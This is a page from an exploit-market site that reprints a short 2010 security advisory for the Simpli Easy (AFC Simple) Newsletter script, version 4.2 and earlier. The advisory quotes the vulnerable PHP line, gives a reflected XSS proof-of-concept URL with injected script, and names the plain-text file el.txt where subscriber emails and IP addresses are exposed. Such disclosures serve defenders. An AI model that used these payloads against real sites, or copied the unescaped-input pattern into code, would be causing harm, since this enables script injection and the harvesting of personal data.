[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage

Author
p0deje
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14662
Category
web applications
Date add
31-10-2010
Platform
php
====================================================================
Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS / Information Leakage
====================================================================

Date: 30.10.2010
Author: p0deje | http://p0deje.blogspot.com
Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php
Version: <= 4.2
  
  1. Cross-site Scripting
        
    Vulnerable code:
      cp.php
      ----------------
      6:  <form name="txtlist" action="cp.php?do=<?=$_GET['do']?>"
method="post">
       
    Proof-of-concept:  
      http://www.example.com/cp.php?do="><script>alert(1)</script>
       
  2. Information Leakage
     
    By default, application saves subscribed email addresses and
    correspondent IP addresses to plain text file el.txt
     
    Proof-of-concept:
      http://www.example.com/el.txt



#  0day.today [2024-12-23]  #